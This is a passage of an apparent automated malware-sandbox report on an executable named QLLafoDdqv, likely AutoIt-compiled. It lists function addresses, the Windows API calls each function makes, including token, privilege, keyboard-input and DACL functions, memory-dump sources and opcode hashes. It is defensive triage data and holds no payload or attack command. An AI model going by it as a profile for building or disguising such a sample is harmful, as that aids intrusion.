              • Opcode ID: 2a1da503a197f9b7ce5f53b2590544daa5a8d2e2f6e172effb38e5e2b0a3a7dc
              • Instruction ID: 3199269f572017f9a9c47764da8140db7e3c88412d754547f9726722210c50b0
              • Opcode Fuzzy Hash: 2a1da503a197f9b7ce5f53b2590544daa5a8d2e2f6e172effb38e5e2b0a3a7dc
              • Instruction Fuzzy Hash: 43F0B471602228E7FB215F629C09B6B37C9AF817A0F148315FA1AA61C1CA78DC0046F4
              Function 00703820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 07224ee06ba8bbdae8e40ca07ef8ee1516b08c0374c19c0fcf1cdc2d67d875c3
              • Instruction ID: 09fa9a2ec818a8685a1700816b2f390152e1071dd1a73c792986c850c77d881d
              • Opcode Fuzzy Hash: 07224ee06ba8bbdae8e40ca07ef8ee1516b08c0374c19c0fcf1cdc2d67d875c3
              • Instruction Fuzzy Hash: EEE0E531101228DAE7212A669C01BAB37CEAF827B0F0582A5FD05928C0CB59DE0182F4
              Function 006D4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
              Download Yara Rule
              APIs
              • FreeLibrary.KERNEL32(?,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4F6D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID:
              • API String ID: 3664257935-0
              • Opcode ID: 6f379503e744c828ed5a7a4d3527db2dc167e4f66e722b20b2b062dffc90dd9a
              • Instruction ID: b1c3d25e88725391489fe39014f31fdd2428bd8c71544a5fa44e7e858eb0eb40
              • Opcode Fuzzy Hash: 6f379503e744c828ed5a7a4d3527db2dc167e4f66e722b20b2b062dffc90dd9a
              • Instruction Fuzzy Hash: 79F01571905752CFDB389F64D490862BBE6AF54329320C96FE2EA82721CB329C44DB50
              Function 006D2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
              Download Yara Rule
              APIs
              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006D2DC4
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LongNamePath_wcslen
              • String ID:
              • API String ID: 541455249-0
              • Opcode ID: 563135c96dd1cd83bd4d3c0f82aa29a19eab532faf434f93fec962cb82b71e52
              • Instruction ID: 96d139bb0ee0fadfac485d8c487a3b054639c80b056c9e4d9a34d1f3b425df6e
              • Opcode Fuzzy Hash: 563135c96dd1cd83bd4d3c0f82aa29a19eab532faf434f93fec962cb82b71e52
              • Instruction Fuzzy Hash: 48E0CD72A042245BC711A258DC05FEA77EDDFC8790F044076FD09D7248D964AD808554
              Function 00742693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __fread_nolock
              • String ID:
              • API String ID: 2638373210-0
              • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
              • Instruction ID: 5af7a22c18f3a1d3a3e355b2a7601ce10ab7de3fbd559ca8b801ade10961ad6c
              • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
              • Instruction Fuzzy Hash: 9CE048B06097005FDF395E28A8517B677D59F49340F00045EF69B83653E6726856864D
              Function 006D2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006D3908
                • Part of subcall function 006DD730: GetInputState.USER32 ref: 006DD807
              • SetCurrentDirectoryW.KERNEL32(?), ref: 006D2B6B
                • Part of subcall function 006D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 006D314E
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconNotifyShell_$CurrentDirectoryInputState
              • String ID:
              • API String ID: 3667716007-0
              • Opcode ID: bee657f5b097ef589e7c36d49020a9b3ee7f8539c9a946633facba3088b42fe9
              • Instruction ID: edef477a271c63e4342d898df42b961692f0689ed6ecfbeef44e16163f68a6d8
              • Opcode Fuzzy Hash: bee657f5b097ef589e7c36d49020a9b3ee7f8539c9a946633facba3088b42fe9
              • Instruction Fuzzy Hash: 5DE08621F0425406CA48BB75A8525BDB75B9BD6355F40553FF14283362CE684945426B
              Function 0071039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(00000000,00000000,?,00710704,?,?,00000000,?,00710704,00000000,0000000C), ref: 007103B7
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 4e6aa5a6ef8f924cad1b38639b3a92f54c517a509182a61a8fd547d73fc8e583
              • Instruction ID: d477e03677c6218b0e6dc21e58d2b071fe16924a180e92311d64b03e088f60c5
              • Opcode Fuzzy Hash: 4e6aa5a6ef8f924cad1b38639b3a92f54c517a509182a61a8fd547d73fc8e583
              • Instruction Fuzzy Hash: 57D06C3204020DBBDF028F84DD06EDA3BAAFB48714F018000FE5856020C776E821AB94
              Function 006D1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
              Download Yara Rule
              APIs
              • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 006D1CBC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: InfoParametersSystem
              • String ID:
              • API String ID: 3098949447-0
              • Opcode ID: 23e464ea5a9d661a48ab30560df067c658f9e8b9fc96428defa99192b8fb3478
              • Instruction ID: 437d8e80dc457f589fb94835ac0b8ea9e3086a13963fd3a3fd871fd89376ef4c
              • Opcode Fuzzy Hash: 23e464ea5a9d661a48ab30560df067c658f9e8b9fc96428defa99192b8fb3478
              • Instruction Fuzzy Hash: DFC09B352803049FF6154B84BC5AF107754B389B10F54C001F64A555E3C3E51430DA58
              Function 0072D8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON
              Download Yara Rule
              APIs
              • GetTempPathW.KERNEL32(00000104,?), ref: 0072D8E9
                • Part of subcall function 006D33A7: _wcslen.LIBCMT ref: 006D33AB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: PathTemp_wcslen
              • String ID:
              • API String ID: 1974555822-0
              • Opcode ID: 44458d3a02e53ebcd89e84fea37aca61fe879bc75ff47b1d7432e1174cddedea
              • Instruction ID: cdc76d2006f63cbdaa84e0d970c149d5890f74c1f3387d5ce86a0502187c7efc
              • Opcode Fuzzy Hash: 44458d3a02e53ebcd89e84fea37aca61fe879bc75ff47b1d7432e1174cddedea
              • Instruction Fuzzy Hash: 7EC04C7450116A9FDB909B90DDD9AB87365FF00305F10C095E546551509E749A488B16
              Function 006EFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction ID: 25dd7bffc6e890be414f4559e2f7636999aa0405ef473f3cd4b0355041b4ef49
              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction Fuzzy Hash: 8031F575A01249DBD718CF5AD4809A9FBA2FF49310B7486A5E809CB755E731EDC1CBC0
              Function 015C22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(000001F4), ref: 015C22B1
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
              • Instruction ID: 167e8846189e44a0728faacd3d9c6f085f6d3dd3507f427c457e1ef3c5146bd6
              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
              • Instruction Fuzzy Hash: A6E0BF7494020E9FDB00EFA8D54969E7BB4EF04701F100165FD0592281D63099508A62

              Non-executed Functions

              Function 00769576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0076961A
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0076965B
              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0076969F
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007696C9
              • SendMessageW.USER32 ref: 007696F2
              • GetKeyState.USER32(00000011), ref: 0076978B
              • GetKeyState.USER32(00000009), ref: 00769798
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007697AE
              • GetKeyState.USER32(00000010), ref: 007697B8
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007697E9
              • SendMessageW.USER32 ref: 00769810
              • SendMessageW.USER32(?,00001030,?,00767E95), ref: 00769918
              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0076992E
              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00769941
              • SetCapture.USER32(?), ref: 0076994A
              • ClientToScreen.USER32(?,?), ref: 007699AF
              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007699BC
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007699D6
              • ReleaseCapture.USER32 ref: 007699E1
              • GetCursorPos.USER32(?), ref: 00769A19
              • ScreenToClient.USER32(?,?), ref: 00769A26
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00769A80
              • SendMessageW.USER32 ref: 00769AAE
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00769AEB
              • SendMessageW.USER32 ref: 00769B1A
              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00769B3B
              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00769B4A
              • GetCursorPos.USER32(?), ref: 00769B68
              • ScreenToClient.USER32(?,?), ref: 00769B75
              • GetParent.USER32(?), ref: 00769B93
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00769BFA
              • SendMessageW.USER32 ref: 00769C2B
              • ClientToScreen.USER32(?,?), ref: 00769C84
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00769CB4
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00769CDE
              • SendMessageW.USER32 ref: 00769D01
              • ClientToScreen.USER32(?,?), ref: 00769D4E
              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00769D82
                • Part of subcall function 006E9944: GetWindowLongW.USER32(?,000000EB), ref: 006E9952
              • GetWindowLongW.USER32(?,000000F0), ref: 00769E05
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
              • String ID: @GUI_DRAGID$F$p#z
              • API String ID: 3429851547-1540955567
              • Opcode ID: e8027b4b60ec734027a5cac4b19118d96f840ad285ff4194ee94c370c636445e
              • Instruction ID: 7a275131c28007e500befe792f2272de77986f046660e3848057fefe466901d2
              • Opcode Fuzzy Hash: e8027b4b60ec734027a5cac4b19118d96f840ad285ff4194ee94c370c636445e
              • Instruction Fuzzy Hash: 44429C34204341EFDB25CF28CC44AAABBE9FF89310F14465DFA9A872A1D779E850CB55
              Function 00764873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007648F3
              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00764908
              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00764927
              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0076494B
              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0076495C
              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0076497B
              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007649AE
              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007649D4
              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00764A0F
              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00764A56
              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00764A7E
              • IsMenu.USER32(?), ref: 00764A97
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00764AF2
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00764B20
              • GetWindowLongW.USER32(?,000000F0), ref: 00764B94
              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00764BE3
              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00764C82
              • wsprintfW.USER32 ref: 00764CAE
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00764CC9
              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00764CF1
              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00764D13
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00764D33
              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00764D5A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
              • String ID: %d/%02d/%02d
              • API String ID: 4054740463-328681919
              • Opcode ID: eb4ba75ea80f15fbe7de6497bdeae8953a734767c15a621c2c86ca14640740e9
              • Instruction ID: ad4ffb4d250d748a69cbfe89c402f1c4327c732937e39f5e5be5d4a7b59b8de7
              • Opcode Fuzzy Hash: eb4ba75ea80f15fbe7de6497bdeae8953a734767c15a621c2c86ca14640740e9
              • Instruction Fuzzy Hash: CB12FD71600345ABEB258F24DC49FBE7BF8EF45310F148169F916EB2A1DBB89940CB54
              Function 006EF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
              Download Yara Rule
              APIs
              • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 006EF998
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0072F474
              • IsIconic.USER32(00000000), ref: 0072F47D
              • ShowWindow.USER32(00000000,00000009), ref: 0072F48A
              • SetForegroundWindow.USER32(00000000), ref: 0072F494
              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0072F4AA
              • GetCurrentThreadId.KERNEL32 ref: 0072F4B1
              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0072F4BD
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0072F4CE
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0072F4D6
              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0072F4DE
              • SetForegroundWindow.USER32(00000000), ref: 0072F4E1
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072F4F6
              • keybd_event.USER32(00000012,00000000), ref: 0072F501
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072F50B
              • keybd_event.USER32(00000012,00000000), ref: 0072F510
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072F519
              • keybd_event.USER32(00000012,00000000), ref: 0072F51E
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072F528
              • keybd_event.USER32(00000012,00000000), ref: 0072F52D
              • SetForegroundWindow.USER32(00000000), ref: 0072F530
              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0072F557
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
              • String ID: Shell_TrayWnd
              • API String ID: 4125248594-2988720461
              • Opcode ID: 17de642866ee97a1ccacce39f5d04e374aea8e4a31b135403823bef0630b0f23
              • Instruction ID: 926c1e45b0aee2b34e01e9e6b845a478888befba4b1de5e980da59b5c3e4829e
              • Opcode Fuzzy Hash: 17de642866ee97a1ccacce39f5d04e374aea8e4a31b135403823bef0630b0f23
              • Instruction Fuzzy Hash: F2319671A403187BEB216FB65C4AFBF7E7CEB44B50F204065F602E61D1C6F55D10AA64
              Function 00731201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 007316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0073170D
                • Part of subcall function 007316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0073173A
                • Part of subcall function 007316C3: GetLastError.KERNEL32 ref: 0073174A
              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00731286
              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007312A8
              • CloseHandle.KERNEL32(?), ref: 007312B9
              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007312D1
              • GetProcessWindowStation.USER32 ref: 007312EA
              • SetProcessWindowStation.USER32(00000000), ref: 007312F4
              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00731310
                • Part of subcall function 007310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007311FC), ref: 007310D4
                • Part of subcall function 007310BF: CloseHandle.KERNEL32(?,?,007311FC), ref: 007310E9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
              • String ID: $default$winsta0$Zy
              • API String ID: 22674027-3658735108
              • Opcode ID: 2b5f472f73ab489e27c1134d6687f2338412174586db7470f9c752f0e4769bc0
              • Instruction ID: 2286707e369433f30c1929e76b8c96cb9e6e2cba471c3f6a0c462a38e4463468
              • Opcode Fuzzy Hash: 2b5f472f73ab489e27c1134d6687f2338412174586db7470f9c752f0e4769bc0
              • Instruction Fuzzy Hash: AB81AC71900349AFEF219FA4DC49FFE7BB9EF04700F188129F911A61A2CB798944CB65
              Function 00730B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 007310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00731114
                • Part of subcall function 007310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731120
                • Part of subcall function 007310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 0073112F
                • Part of subcall function 007310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731136
                • Part of subcall function 007310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0073114D
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00730BCC
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00730C00
              • GetLengthSid.ADVAPI32(?), ref: 00730C17
              • GetAce.ADVAPI32(?,00000000,?), ref: 00730C51
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00730C6D
              • GetLengthSid.ADVAPI32(?), ref: 00730C84
              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00730C8C
              • HeapAlloc.KERNEL32(00000000), ref: 00730C93
